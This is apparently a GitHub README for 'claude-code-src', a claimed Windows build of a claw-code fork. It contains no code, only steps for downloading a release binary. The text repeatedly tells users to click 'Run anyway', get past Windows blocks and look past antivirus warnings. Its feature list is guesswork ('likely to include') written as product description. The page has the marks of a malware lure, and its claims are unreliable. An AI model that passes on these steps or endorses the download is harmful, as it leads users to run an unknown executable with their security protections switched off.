🤖 claude-code-src - Simple Windows setup for daily use

Download

🚀 What this is

claude-code-src is a Windows app built from the first version of the forked code in the instructkr/claw-code line. It is made for users who want a local app they can download and run from a GitHub release page.

This project uses an agent-style workflow and a harness-based code setup. In plain terms, it helps the app handle tasks in a structured way while keeping the interface simple for end users.

📥 Download

Visit this page to download:

GitHub Releases

On that page, look for the latest release and download the Windows file. If you see a .exe file, save it to your computer and run it. If you see a .zip file, download it, unzip it, and then open the app inside the folder.

🖥️ Windows setup

  1. Open the Releases page.
  2. Find the latest version near the top of the page.
  3. Download the Windows file for your system.
  4. If Windows asks for permission, choose Yes or Run anyway.
  5. If you downloaded a .zip file, right-click it and choose Extract All.
  6. Open the extracted folder and start the app file.

✅ Before you run it

For the smoothest setup, use:

  • Windows 10 or Windows 11
  • A desktop or laptop with at least 4 GB of RAM
  • At least 200 MB of free disk space
  • A stable internet connection for the first download

If the app uses a .zip package, keep the files in the same folder after extraction. Moving only one file can break the launch step.

🧭 First launch

When you start the app for the first time, Windows may show a security prompt. This can happen with new apps from GitHub.

If that happens:

  1. Check that you downloaded it from the release page above.
  2. Open the file.
  3. If Windows blocks it, choose the option that lets you run it.

If the app opens in a window and shows a simple workspace, the setup worked.

🗂️ What you get

This project is built for a clear, guided code workflow. Based on the repo name and topic set, the app is likely to include:

  • A simple desktop launch flow
  • Agent-based task handling
  • A harness layer for structured runs
  • Source-based project files for Windows releases
  • A layout that supports code-oriented work without setup steps for the user

🔧 Common use cases

You may use claude-code-src if you want:

  • A Windows app that starts from a release download
  • A source-based fork with a clean release path
  • A tool that follows an agent workflow
  • A project built around code tasks and harness control
  • A local app that does not ask for a complex install process

🛠️ How to keep it working

If the app does not open, try these steps:

  1. Re-download the file from the release page.
  2. Make sure the download finished fully.
  3. If you used a .zip file, extract it again.
  4. Keep the extracted folder in a simple path, such as Downloads or Desktop.
  5. Do not rename the main app file unless you know it is safe.
  6. Restart your computer and try again.

If the app starts but closes fast, check whether you opened the right file from the release folder and not a helper file or text file.

📌 File types you may see

The release page may include one or more of these file types:

  • .exe — double-click to run
  • .zip — extract first, then open the app
  • .msi — run the installer and follow the steps
  • .txt or .md — read this file for release notes or extra details

If there are more than one download option, choose the one that says Windows or matches your PC type.

🔍 Project details

  • Repository: claude-code-src
  • Description: First version of the forked code from instructkr/claw-code
  • Topics: agent, claude-code, harness, source

These topics point to a code-focused app that uses a controlled workflow and source-level structure.

🧩 Troubleshooting

If Windows says the app is unsafe, check the release page again and confirm you used the official download link.

If the app does not open after extraction, make sure:

  • The file is not still inside the ZIP
  • The folder path is not too long
  • Your antivirus did not block the file
  • You opened the main app file, not a support file

If you still have trouble, remove the downloaded files, get a fresh copy from the release page, and try again
